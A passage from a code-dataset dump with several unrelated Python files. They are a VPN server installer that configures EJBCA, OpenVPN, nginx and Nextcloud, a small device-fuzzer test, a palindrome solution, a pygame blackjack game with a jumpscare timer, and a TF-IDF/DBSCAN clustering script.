mysql=self.mysql, nginx=self.nginx, config=self.config)\n self.nextcloud = nextcloud.NextCloud(sysconfig=self.syscfg, audit=self.audit, write_dots=True,\n mysql=self.mysql, nginx=self.nginx, config=self.config)\n self.ejabberd = ejabberd.Ejabberd(sysconfig=self.syscfg, audit=self.audit, write_dots=True, config=self.config)\n\n self.ejbca.openvpn = self.ovpn\n\n def init_prepare_install(self):\n \"\"\"\n Disable interfering services\n :return: \n \"\"\"\n Installer.init_prepare_install(self)\n\n # If VPN server was running, stop it now - easier port testing, minimal interference.\n self.ovpn.switch(stop=True)\n self.dnsmasq.switch(stop=True)\n self.nginx.switch(stop=True)\n self.ejabberd.switch(stop=True)\n self.vpnauth.switch(stop=True, ignore_error=True)\n self.php.switch(stop=True)\n\n def init_main_try(self):\n \"\"\"\n Main installer block, called from the global try:\n :return:\n \"\"\"\n self.full_reinstall = True\n self.init_config_new_install()\n self.init_services()\n self.ejbca.do_vpn = True\n\n # Get registration options and choose one - network call.\n self.reg_svc.load_auth_types()\n\n # Show email prompt and intro text only for new initializations.\n res = self.init_prompt_user()\n if res != 0:\n return self.return_code(res)\n\n # Disable services which may interfere installation.\n self.init_prepare_install()\n\n # System check 
proceeds (mem, network).\n # We do this even if we continue with previous registration, to have fresh view on the system.\n # Check if we have EJBCA resources on the drive\n res = self.init_test_environment()\n if res != 0:\n return self.return_code(res)\n\n # Determine if we have enough RAM for the work.\n # If not, a new swap file is created so the system has at least 2GB total memory space\n # for compilation & deployment.\n self.syscfg.install_epiper()\n res = self.install_check_memory(syscfg=self.syscfg)\n if res != 0:\n return self.return_code(res)\n\n # Update the OS.\n if not self.args.no_os_update:\n self.update_main_try()\n\n # Preferred LE method? If set...\n self.last_is_vpc = False\n\n # Lets encrypt reachability test, if preferred method is DNS - do only one attempt.\n # We test this to detect VPC also. If 443 is reachable, we are not in VPC\n res, args_le_preferred_method = self.init_le_vpc_check(self.get_args_le_verification(),\n self.get_args_vpc(), reg_svc=self.reg_svc)\n if res != 0:\n return self.return_code(res)\n\n # Firewall tuning\n self.ejbca.setup_os()\n self.ovpn.setup_os()\n\n # Test ports opened here...\n res = self.init_test_ports_pre_install()\n if res != 0:\n return self.return_code(res)\n\n # User registration may be multi-step process.\n res, new_config = self.init_enigma_registration()\n if res != 0:\n return self.return_code(res)\n\n # Custom hostname for EJBCA - not yet supported\n new_config.ejbca_hostname_custom = False\n new_config.is_private_network = self.last_is_vpc\n new_config.le_preferred_verification = args_le_preferred_method\n\n # Assign a new dynamic domain for the host\n res, self.domain_is_ok = self.init_domains_check(reg_svc=self.reg_svc)\n new_config = self.reg_svc.config\n if res != 0:\n return self.return_code(res)\n\n # Dump config\n conf_file = Core.write_configuration(new_config)\n self.tprint('New configuration was written to: %s\\n' % conf_file)\n\n # Certbot\n res = self.init_certbot()\n if res != 0:\n return self.return_code(res)\n\n # Database\n res = self.init_database()\n if res != 0:\n return self.return_code(res)\n\n # SoftHSMv1 reconfigure\n res = self.init_softhsm(new_config=new_config)\n if res != 0:\n return self.return_code(res)\n\n # EJBCA configuration\n res = self.init_install_ejbca(new_config=new_config)\n if res != 0:\n return self.return_code(res)\n\n # Generate new keys\n res = self.init_create_vpn_eb_keys()\n if res != 0:\n return self.return_code(res)\n\n # JBoss restart is needed - so it sees the new keys\n self.init_jboss_restart()\n\n # VPN setup - create CA, profiles, server keys, CRL\n self.init_ejbca_vpn()\n\n # phase 2 - post EJBCA install\n self.config = new_config\n self.init_main_phase_2_try()\n\n def init_main_phase_2_try(self):\n \"\"\"\n Next phase of the installation - post EJBCA install.\n :return: \n \"\"\"\n # LetsEncrypt enrollment\n self.init_le_subdomains()\n res = self.init_le_install()\n if res != 0:\n return self.return_code(res)\n\n # VPN server - install, configure, enable, start\n self.tprint('\\n\\nInstalling & configuring VPN server')\n self.init_vpn()\n self.init_supervisord()\n self.init_dnsmasq()\n self.init_nginx()\n self.init_vpnauth()\n self.init_privatespace_web()\n\n if self.is_cloud_enabled():\n self.init_nextcloud()\n self.init_ejabberd()\n\n self.init_nginx_start()\n self.init_vpn_start()\n self.init_dnsmasq_restart()\n\n self.tprint('')\n self.init_celebrate()\n self.cli_sleep(3)\n self.cli_separator()\n\n # Finalize, P12 file & final instructions\n new_p12 = 
self.ejbca.copy_p12_file()\n self.init_show_p12_info(new_p12=new_p12)\n\n # Generate VPN client for the admin. openvpn link will be emailed\n if self.full_reinstall:\n self.init_create_vpn_users()\n\n # Install to the OS - cron job & on boot service\n res = self.init_install_os_hooks()\n if res != 0:\n return self.return_code(res)\n\n # Test if main admin port of EJBCA is reachable - server is running. Public port needed for VPN config download\n self.init_test_ejbca_ports_reachability(check_public=True)\n\n self.cli_sleep(5)\n return self.return_code(0)\n\n def init_jboss_restart(self):\n \"\"\"\n Restarts jboss\n :return: \n \"\"\"\n if self.args.no_ejbca_install:\n logger.warning('EJBCA disabled, JBoss restart skipped')\n return\n self.ejbca.jboss_restart()\n\n def init_ejbca_vpn(self):\n \"\"\"\n Configures EJBCA for use for VPN\n Throws an exception if something goes wrong.\n :return:\n \"\"\"\n if self.args.no_ejbca_install:\n logger.warning('EJBCA disabled, cannot prepare VPN vars')\n return\n\n ret = self.ejbca.vpn_create_ca()\n if ret != 0:\n raise errors.SetupError('Cannot create CA for the VPN')\n\n ret = self.ejbca.vpn_create_profiles()\n if ret != 0:\n raise errors.SetupError('Cannot create new identity profiles in EJBCA for VPN')\n\n time.sleep(2)\n ret = self.ejbca.vpn_create_server_certs()\n if ret != 0:\n raise errors.SetupError('Cannot create new certificate for VPN server')\n\n ret = self.ejbca.vpn_create_crl()\n if ret != 0:\n raise errors.SetupError('Cannot generate new CRL for the VPN')\n\n self.vpn_keys = self.ejbca.vpn_get_server_cert_paths()\n self.vpn_crl = self.ejbca.vpn_get_crl_path()\n self.vpn_client_config = self.ejbca.vpn_get_vpn_client_config_path()\n self.ejbca.vpn_install_cron()\n\n def init_vpn(self):\n \"\"\"\n Installs and configures VPN daemon.\n Throws an exception if something goes wrong.\n :return:\n \"\"\"\n self.ovpn.config = self.config\n\n ret = self.ovpn.install()\n if ret != 0:\n raise errors.SetupError('Cannot install openvpn package')\n\n ret = self.ovpn.generate_dh_group(self.full_reinstall)\n if ret != 0:\n raise errors.SetupError('Cannot generate a new DH group for VPN server')\n\n self.ovpn.configure_server()\n\n vpn_ca, vpn_cert, vpn_key = self.vpn_keys\n if self.args.no_ejbca_install:\n logger.warning('EJBCA disabled, VPN wont be configured properly')\n\n else:\n ret = self.ovpn.store_server_cert(ca=vpn_ca, cert=vpn_cert, key=vpn_key)\n if ret != 0:\n raise errors.SetupError('Cannot install VPN certificate+key to the VPN server')\n\n self.ovpn.configure_crl(crl_path=self.vpn_crl)\n\n # Configure VPN client configuration file to match the server config\n self.ovpn.client_config_path = self.vpn_client_config\n self.ovpn.configure_client()\n self.ejbca.jboss_fix_privileges()\n\n # OS configuration\n ret = self.ovpn.setup_os()\n if ret != 0:\n raise errors.SetupError('Cannot configure OS for the openvpn server (ip forwarding, masquerade)')\n\n # Starting VPN server\n ret = self.ovpn.enable()\n if ret != 0:\n raise errors.SetupError('Cannot set openvpn server to start after boot')\n\n Core.write_configuration(self.config)\n\n def init_vpn_start(self):\n \"\"\"\n Starts VPN server\n :return:\n \"\"\"\n if self.args.no_ejbca_install and self.full_reinstall:\n logger.warning('EJBCA disabled, VPN wont be started')\n return\n\n ret = self.ovpn.switch(restart=True)\n if ret != 0:\n raise errors.SetupError('Cannot start openvpn server')\n\n def init_dnsmasq(self):\n \"\"\"\n Initializes DNSMasq\n Throws an exception if something goes wrong.\n 
:return:\n \"\"\"\n self.dnsmasq.hostname = self.certificates.hostname\n self.dnsmasq.vpn_server_ip = self.ovpn.get_ip_vpn_server()\n\n ret = self.dnsmasq.install()\n if ret != 0:\n raise errors.SetupError('Error with dnsmasq installation')\n\n self.dnsmasq.configure_server()\n\n ret = self.dnsmasq.enable()\n if ret != 0:\n raise errors.SetupError('Error with setting dnsmasq to start after boot')\n\n self.dnsmasq.switch(restart=True)\n\n def init_dnsmasq_restart(self):\n \"\"\"\n Restarts dns masq\n :return: \n \"\"\"\n ret = self.dnsmasq.switch(restart=True)\n if ret != 0:\n raise errors.SetupError('Error in starting dnsmasq daemon')\n\n def init_nginx(self):\n \"\"\"\n Initializes Nginx\n Throws an exception if something goes wrong.\n :return:\n \"\"\"\n self.nginx.hostname = self.certificates.hostname\n self.nginx.domains = self.config.domains\n self.nginx.internal_addresses = ['%s/%s' % (self.ovpn.get_ip_net(), self.ovpn.get_ip_net_size())]\n self.nginx.cert_dir = self.ejbca.cert_dir\n self.nginx.html_root = self.pspace_web.get_public_dir() # Laravel based private space landing page\n self.nginx.add_le_subdomains(self.certificates.subdomains)\n\n ret = self.nginx.install()\n if ret != 0:\n raise errors.SetupError('Error with nginx installation')\n\n # Loading basic info\n self.nginx.load_configuration()\n\n # Install PHP\n self.init_php()\n\n # Configure properly\n self.nginx.configure_server()\n\n # Use Nginx certbot plugin for renewal\n self.config.le_renew_nginx = True\n Core.write_configuration(self.config)\n\n ret = self.nginx.enable()\n if ret != 0:\n raise errors.SetupError('Error with setting nginx to start after boot')\n\n def init_nginx_start(self):\n \"\"\"\n Starts Nginx\n Can start it after it is properly configured & PHP is installed\n :return: \n \"\"\"\n ret = self.nginx.switch(restart=True)\n if ret != 0:\n raise errors.SetupError('Error in starting nginx daemon')\n\n def init_php(self):\n \"\"\"\n Installs php\n :return: \n \"\"\"\n self.php.user = self.nginx.nginx_user\n self.php.install()\n self.php.configure()\n\n ret = self.php.enable()\n if ret != 0:\n raise errors.SetupError('Error with setting php to start after boot')\n\n ret = self.php.switch(restart=True)\n if ret != 0:\n raise errors.SetupError('Error in starting php daemon')\n\n def init_privatespace_web(self):\n \"\"\"\n Initializes private space web\n :return: \n \"\"\"\n self.pspace_web.config = self.config\n self.pspace_web.user = self.nginx.nginx_user\n self.pspace_web.stats_file_path = self.vpnauth.get_stats_file_path()\n self.pspace_web.admin_email = self.config.email\n self.pspace_web.hostname = self.certificates.hostname\n self.pspace_web.vpn_net_addr = self.ovpn.get_ip_net()\n self.pspace_web.vpn_net_size = self.ovpn.get_ip_net_size()\n self.pspace_web.vpn_net_server = self.ovpn.get_ip_vpn_server()\n\n self.pspace_web.install()\n self.pspace_web.configure()\n Core.write_configuration(self.config)\n\n def init_supervisord(self):\n \"\"\"\n Installs supervisord\n :return:\n \"\"\"\n self.supervisord.install()\n\n ret = self.supervisord.enable()\n if ret != 0:\n raise errors.SetupError('Error with setting supervisord to start after boot')\n\n ret = self.supervisord.switch(restart=True)\n if ret != 0:\n raise errors.SetupError('Error in starting supervisord daemon')\n\n def init_vpnauth(self):\n \"\"\"\n Installs vpn auth server\n Has to be called after VPN is installed buf before VPN is started\n :return:\n \"\"\"\n self.vpnauth.config = self.config\n self.vpnauth.ejbca = self.ejbca\n\n 
self.vpnauth.install()\n self.vpnauth.configure()\n self.vpnauth.configure_vpn_server()\n Core.write_configuration(self.config)\n\n self.vpnauth.enable()\n self.vpnauth.switch(start=True)\n\n def init_create_vpn_eb_keys(self):\n \"\"\"\n Creates a new keys in the SoftHSM token -> EB.\n :return:\n \"\"\"\n if self.args.no_ejbca_install:\n logger.warning('EJBCA disabled, cannot generate keys')\n return 0\n\n self.tprint('\\nEnigma Bridge service will generate new keys:')\n ret, out, err = self.ejbca.pkcs11_generate_default_key_set(softhsm=self.soft_config)\n\n if ret != 0:\n self.tprint(self.t.red('\\nError generating new keys'))\n self.tprint('The installation has to be repeated later')\n\n self.tprint('\\nError from the command:')\n self.tprint(''.join(out))\n self.tprint('\\n')\n self.tprint(''.join(err))\n return 1\n return 0\n\n def init_create_vpn_users(self):\n \"\"\"\n Create default VPN users, final steps\n :return: \n \"\"\"\n if self.args.no_ejbca_install:\n logger.warning('EJBCA disabled, cannot create VPN users')\n return 0\n\n self.ejbca.vpn_create_user(self.config.email, 'default')\n token = self.ejbca.vpn_create_p12_otp()\n self.config.p12_otp_superadmin = token\n\n def init_install_os_hooks(self):\n \"\"\"\n Install OS hooks - cronjob for cert checking, on boot service for dynamic DNS\n :return: result\n \"\"\"\n install_type = 'vpn'\n self.syscfg.install_onboot_check(install_type=install_type)\n self.syscfg.install_cron_renew(install_type=install_type)\n self.syscfg.install_cron_update(install_type=install_type)\n return 0\n\n def reinstall_soft_body(self):\n \"\"\"\n Reinstallation after initial checks\n :return: \n \"\"\"\n self.vpn_keys = self.ejbca.vpn_get_server_cert_paths()\n self.vpn_crl = self.ejbca.vpn_get_crl_path()\n self.vpn_client_config = self.ejbca.vpn_get_vpn_client_config_path()\n self.full_reinstall = False\n self.nextcloud.doing_reinstall = True\n self.ovpn.doing_reinstall = True\n\n self.reinstall_ejbca()\n\n self.ovpn.load_from_config()\n\n ret = self.init_main_phase_2_try()\n if ret != 0:\n raise errors.SetupError('Reinstall failed')\n Core.write_configuration(self.config)\n\n return ret\n\n def restart_main(self):\n \"\"\"\n Restarts all services\n :return: \n \"\"\"\n Installer.restart_main(self)\n\n self.php.switch(restart=True)\n self.nginx.switch(restart=True)\n self.ovpn.switch(restart=True)\n self.ejabberd.switch(restart=True)\n self.dnsmasq.switch(restart=True)\n self.supervisord.switch(restart=True)\n self.vpnauth.switch(restart=True)\n\n def le_renewed(self):\n \"\"\"\n Letsencrypt was renewed\n :return: \n \"\"\"\n Installer.le_renewed(self)\n\n self.nginx.switch(restart=True)\n self.ejabberd.on_cert_renewed()\n\n def init_ejabberd(self):\n \"\"\"\n Installs ejabberd\n :return: \n \"\"\"\n self.ejabberd.config = self.config\n self.ejabberd.hostname = self.certificates.hostname\n self.ejabberd.extauth_token = self.config.nextcloud_jsxc_token\n self.ejabberd.extauth_endpoint = self.nextcloud.get_extauth_endpoint()\n\n self.ejabberd.install()\n self.ejabberd.configure()\n self.ejabberd.enable()\n\n def init_nextcloud(self):\n \"\"\"\n Initializes private space web\n :return: \n \"\"\"\n self.nextcloud.config = self.config\n self.nextcloud.user = self.nginx.nginx_user\n self.nextcloud.hostname = self.certificates.hostname\n\n self.nextcloud.install()\n self.nextcloud.configure()\n self.config.nextcloud_installed = True\n\n self.pspace_web.add_tile('Cloud', 'fa-cloud', self.nextcloud.get_link())\n Core.write_configuration(self.config)\n\n def 
is_cloud_enabled(self):\n \"\"\"\n Clud installation enabled\n :return: \n \"\"\"\n if self.args.cloud:\n return True\n if self.config is not None:\n return self.config.nextcloud_installed\n\n def init_le_subdomains(self):\n \"\"\"\n Init subdomains\n :return: \n \"\"\"\n Installer.init_le_subdomains(self)\n\n if self.is_cloud_enabled():\n self.nextcloud.config = self.config\n self.nextcloud.hostname = self.certificates.hostname\n\n subs = self.nextcloud.get_domains()\n self.certificates.add_subdomains(subs)\n self.certificates.register_subdomains()\n\n\ndef main():\n app = VpnInstaller()\n app.app_main()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"EnigmaBridge/ebstall.py","sub_path":"ebstall/clivpn.py","file_name":"clivpn.py","file_ext":"py","file_size_in_byte":30204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43073986737","text":"import socket\nfrom sender.message import Message, MessageType\nimport time\nfrom mutator import mutator\n\ndef test1():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((\"localhost\", 57001))\n s.close()\n msg = Message(MessageType.DEV_PATH, '/dev/null')\n data = msg.pack()\n print(data)\n s.send(data)\n msg = Message(MessageType.IOCTL, 13371337, 'ablablablablabala'.encode())\n data = msg.pack()\n print(data)\n s.send(data)\n time.sleep(1)\n s.close()\n\n\ndef test2():\n m = Mutator()\n\n\ntest2()\n","repo_name":"Thun0/dev-fuzz","sub_path":"vm_manager/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35850212320","text":"# encoding=utf-8\n\nclass Solution:\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n sum = 0\n x_ = x\n while x_ > 0:\n sum = 10 * sum + x_ % 10\n x_ //= 10\n return sum == x\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.isPalindrome(12321))\n","repo_name":"feizhihui/LeetCode","sub_path":"page1/main9.py","file_name":"main9.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86698975663","text":"import pygame, time, random, spritesheethelper\nfrom spritesheethelper import SpriteStripAnim\nfrom playsound import playsound\nfrom pygame import mixer\npygame.init()\nmixer.init()\ncardslist = ['A', 'A', 'A', 'A', 'K', 'K', 'K', 'K', 'Q', 'Q', 'Q', 'Q', 'J', 'J', 'J', 'J', '10', '10', '10', '10', '9', '9', '9', '9', '8', '8', '8', '8', '7', '7', '7', '7', '6', '6', '6', '6', '5', '5', '5', '5', '4', '4', '4', '4', '3', '3', '3', '3', '2', '2', '2', '2']\ndeadcards = []\narea = 1\nminutes = 5\nseconds = 0\npygame.display.set_caption('Blackjack')\nscreen = pygame.display.set_mode((1000, 675))\n# = pygame.transform.scale(, (95, 30))\nmed_font = pygame.font.SysFont(\"Mochiy Pop One\", 30)\nfont_style = pygame.font.SysFont(\"Mochiy Pop One\", 50)\nsmall_font = pygame.font.SysFont(\"Mochiy Pop One\", 20)\nbig_font = pygame.font.SysFont(\"Mochiy Pop One\", 145)\nverybig_font = pygame.font.SysFont(\"Algerian\", 70)\nhuge_font = pygame.font.SysFont(\"Algerian\", 175)\nmenustarttext = verybig_font.render(\"START\", True, [0, 0, 0])\nmenuoptionstext = verybig_font.render(\"OPTIONS\", True, [0, 0, 0])\nmenuexittext = verybig_font.render(\"EXIT\", True, [0, 0, 0])\n\n\nsecondevent = pygame.USEREVENT + 1\npygame.time.set_timer(secondevent, 1000)\n\n\nstrips = [\n 
SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 350),\n SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 1000),\n SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 2000),\n SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 3000),\n SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 1000),\n SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 10)\n]\nfadestrips = [\n SpriteStripAnim('assets/jumpscares/fadespritesheet.png', (0,0,1000,675), 4, None, False, 500),\n SpriteStripAnim('assets/jumpscares/fadespritesheet.png', (0,0,1000,675), 4, None, False, 500),\n SpriteStripAnim('assets/jumpscares/fadespritesheet.png', (0,0,1000,675), 4, None, False, 500),\n SpriteStripAnim('assets/jumpscares/fadespritesheet.png', (0,0,1000,675), 4, None, False, 500)\n]\n\npixintrostrips = [\n SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 4, None, False, 1000),\n SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 4, None, False, 1000),\n SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 4, None, False, 8000),\n SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 4, None, False, 1000),\n #SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 8, None, False, 1500),\n #SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 8, None, False, 1000),\n #SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 8, None, False, 1000),\n #SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 8, None, False, 1000)\n #SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 8, None, False, 1000)\n]\nn = 0\nf = 0\ng = 0\nstrips[n].iter()\npixintrostrips[g].iter()\nimage = strips[n].next()\npixintroimage = pixintrostrips[g].next()\n#while True:\n #for e in pygame.event.get():\n #if e.type == pygame.KEYDOWN:\n #if e.key == pygame.K_ESCAPE:\n #exit()\n #elif e.key == pygame.K_RETURN:\n #n += 1\n #if n >= len(strips):\n #n = 0\n #strips[n].iter()\n #screen.fill(0, 0, 0)\n\n #screen.blit(pygame.transform.scale(image, (0,0)), [1000, 675])\n \n\n\ncards = [\n pygame.transform.scale(pygame.image.load('assets/cards/A.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/K.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/2.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/3.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/4.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/5.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/6.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/7.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/8.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/9.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/10.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/Q.png').convert_alpha(), (121, 199)),\n 
pygame.transform.scale(pygame.image.load('assets/cards/J.png').convert_alpha(), (121, 199))\n]\n\nmenu = pygame.image.load('assets/menu.png').convert_alpha()\n\ndef jumpscare(what, image, introimage=\"sus\"):\n # what is a cookie clicker reference\n x = 0\n for i in range(0, 3):\n screen.fill((255, 255, 255))\n #pygame.event.get()\n #screen.blit(fadeimage, (0, 0))\n pygame.display.update()\n time.sleep(0.1)\n screen.fill((0, 0, 0))\n pygame.display.update()\n time.sleep(0.1)\n\n if what == \"pix\":\n pixintroimage = introimage\n while True:\n pygame.event.get()\n screen.blit(pixintroimage, (0, 0))\n pygame.display.update()\n try: pixintroimage = pixintrostrips[g].next()\n except Exception as e:\n while True:\n pygame.event.get()\n x += 1\n if x == 1700: \n playsound('assets/audio/vannscream.mp3')\n image = pygame.transform.scale(image, [1000, 675])\n screen.blit(image, (0, 0))\n pygame.display.update()\n try: image = strips[n].next()\n except Exception as e: exit()\n\n\n\ndef placecards(card, x, y):\n try:\n screen.blit(cards[int(card)], [x, y])\n except: \n if card == \"A\": screen.blit(cards[0], [x, y])\n elif card == \"K\": screen.blit(cards[1], [x, y])\n elif card == \"Q\": screen.blit(cards[11], [x, y])\n elif card == \"J\": screen.blit(cards[12], [x, y])\n else: raise Exception(\"Could not display unknown card\")\n\n\ndef cardvalue(card):\n playercount = 0\n try:\n playercount += int(card)\n except:\n if card in \"KQJ\": playercount += 10\n elif card in \"A\":\n if playercount + 11 > 21: playercount += 1\n else: playercount += 11\n return playercount\n\n\n\n\n\nwhile True:\n screen.blit(menu, [0, 0])\n screen.blit(menustarttext, [20, 100])\n screen.blit(menuoptionstext, [20, 190])\n screen.blit(menuexittext, [20, 280])\n \n start = True\n \n \n pygame.display.update()\n \n\n time.sleep(2)\n \n shuffledcards = random.sample(cardslist, len(cardslist))\n playercards = [shuffledcards[0], shuffledcards[1]]\n playercount = 0\n playercardnumber = 0\n dealercount = 0\n dealercardnumber = 0\n \n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN: \n if event.key == pygame.K_ESCAPE: exit()\n\t\t#if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n if event.type == pygame.QUIT: exit()\n\n while start:\n \n \n \n playercount += cardvalue(shuffledcards[0])\n playercount += cardvalue(shuffledcards[1])\n dealercount += cardvalue(shuffledcards[2])\n dealercount += cardvalue(shuffledcards[3])\n #print(str(playercards) + \" \" + str(playercount))\n for event in pygame.event.get():\n if event.type == secondevent: \n seconds -= 1\n if seconds == -1: \n if minutes != 0:\n minutes -= 1; seconds = 59\n else:\n jumpscare(\"pix\", image, pixintroimage)\n\n\n #time.sleep(2)\n if area == -1: area = 1\n while area == 1:\n screen.fill([20, 20, 20])\n if len(str(seconds)) == 1:\n displayseconds = \"0\" + str(seconds)\n else: displayseconds = str(seconds)\n bgtimertext = huge_font.render(str(minutes) + \":\" + str(displayseconds), True, [50, 50, 50])\n playercounttext = big_font.render(str(playercount), True, [50, 50, 50])\n dealercounttext = big_font.render(str(dealercount), True, [50, 50, 50])\n screen.blit(bgtimertext, (250, 210))\n screen.blit(playercounttext, (210, 330))\n screen.blit(dealercounttext, (240, 80))\n\n placecards(shuffledcards[0], 400, 400)\n placecards(shuffledcards[1], 500, 415)\n\n placecards(shuffledcards[2], 360, 10)\n placecards(shuffledcards[3], 470, 45)\n\n for event in pygame.event.get():\n if event.type == secondevent: \n seconds -= 1\n if seconds == -1: \n 
if minutes != 0:\n minutes -= 1; seconds = 59\n else:\n jumpscare(\"pix\", image, pixintroimage)\n if event.type == pygame.KEYDOWN: \n if event.key == pygame.K_ESCAPE: exit()\n if event.key == pygame.K_1:\n playercardnumber += 1; placecards(shuffledcards[3 + playercardnumber], 500 + (110 * playercardnumber), 415 + (35 * playercardnumber)); playercount += cardvalue(shuffledcards[3 + playercardnumber]); print(playercount); \n pygame.display.update()\n if event.key == pygame.K_2:\n while dealercount < 17:\n dealercardnumber += 1; placecards(shuffledcards[10 + dealercardnumber], 470 + (100 * dealercardnumber), 45 + (15 * dealercardnumber)); dealercount += cardvalue(shuffledcards[10 + dealercardnumber])\n if shuffledcards[10 + dealercardnumber] == \"A\":\n if dealercount - 10 <= 21: dealercount -= 10\n #playercounttext = big_font.render(str(playercount), True, [50, 50, 50])\n #dealercounttext = big_font.render(str(dealercount), True, [50, 50, 50])\n #screen.blit(dealercounttext, (240, 80))\n #screen.blit(playercounttext, (210, 330))\n pygame.display.update()\n time.sleep(0.8)\n print(playercount)\n print(dealercount) \n while playercount > 21 or dealercount > playercount and dealercount <= 21: \n jumpscare(\"pix\", image, pixintroimage)\n \n if playercount == 21 or playercount > dealercount or dealercount > 21: print(\"win\"); exit()\n else: print(\"prose\")\n #if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n if event.type == pygame.QUIT: exit()\n while playercount > 21: \n jumpscare(\"pix\", image, pixintroimage)\n pygame.display.update()\n \n\n","repo_name":"wowbaseballgamesocool/blackjack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27613055822","text":"from textblob import TextBlob as tb #text Bynary Large Object\nfrom functools import reduce\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport random\n\n\ndocuments = (\n\"The sky is blue\",\n\"The sun is bright\",\n\"The sun in the sky is bright\",\n\"We can see the shining sun, the bright sun\",\n\"We can see the shining sku, the bright cloud\"\n)\n\n\ntfidf_vectorizer = TfidfVectorizer()\ntfidf_matrix = tfidf_vectorizer.fit_transform(documents)\nmatrix = []\n\nfor i, document in enumerate(documents):\n similarity = cosine_similarity(tfidf_matrix[i:i+1], tfidf_matrix)\n matrix.append((similarity.tolist(), i))\nn = 1\nepsilon = 0.5\n\n#first part \ndef selectRandom(k, list):\n random_select = []\n added = False\n for i in range(k):\n added = False\n while added == False:\n value = random.choice(list) \n if value not in random_select:\n random_select.append(value)\n added = True\n return random_select\n\nlista = selectRandom(n, matrix) # select random m amount of elements.\n\ndef regionScan(current_node, epsilon, matrix):\n neighbourPts = []\n node_position = current_node # get the position of the element in the \n for node in matrix:\n distance = node[0][0][node_position]\n if (1-distance) < epsilon: # inverse to obtain the right distance!\n print('adding node', node[1])\n neighbourPts.append(node[1])\n print(neighbourPts)\n return neighbourPts\n\ndef expandCluster(node, neighbour_nodes, clusters, c_n, epsilon, MinPts, matrix, visited):\n clusters[c_n].append(node[1])\n for n_node in neighbour_nodes:\n if n_node not in visited:\n visited.append(n_node)\n neighbour_node_2 = regionScan(n_node, epsilon, 
matrix)\n if len(neighbour_node_2) >= MinPts:\n for node_2 in neighbour_node_2:\n if node_2 not in neighbour_nodes:\n neighbour_nodes.append(node_2) \n if n_node not in (reduce(lambda x,y: x+y,clusters)):\n clusters[c_n].append(n_node)\n\n\ndef DBSCAN(matrix, epsilon, min_nodes):\n print('epsilon', epsilon)\n print('mnodes', min_nodes)\n noise = []\n visited = []\n clusters = []\n c_n = -1 #cluster number or position\n for node in matrix:\n if node[1] not in visited:\n visited.append(node[1])\n neighbour_nodes = regionScan(node[1], epsilon, matrix)\n if len(neighbour_nodes) < min_nodes:\n print('adding noise')\n noise.append(node[1])\n else:\n clusters.append([])\n c_n += 1\n expandCluster(node, neighbour_nodes, clusters, c_n,epsilon, min_nodes, matrix, visited)\n print(\"no. of clusters: \" , len(clusters))\n print(\"length of noise:\", len(noise))\n print(\"clusters \" , clusters)\n print(\"noise \" , noise)\n \n\nDBSCAN(matrix, 0.4, 2)\n","repo_name":"juancho618/data_analysis","sub_path":"cosine_matrix.py","file_name":"cosine_matrix.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30574643502","text":"ivan = []\nkakita = []\nsoretin = []\ngordapapa = []\nelpeke = []\nivan.append(9)\nkakita.append (8)\nsoretin.append(10)\ngordapapa.append(6)\nivan.append(2)\nkakita.append (5)\nsoretin.append(-10)\ngordapapa.append(11)\ndef suma_jugadas (etiqueta):\n suma = 0\n i = 0\n while i 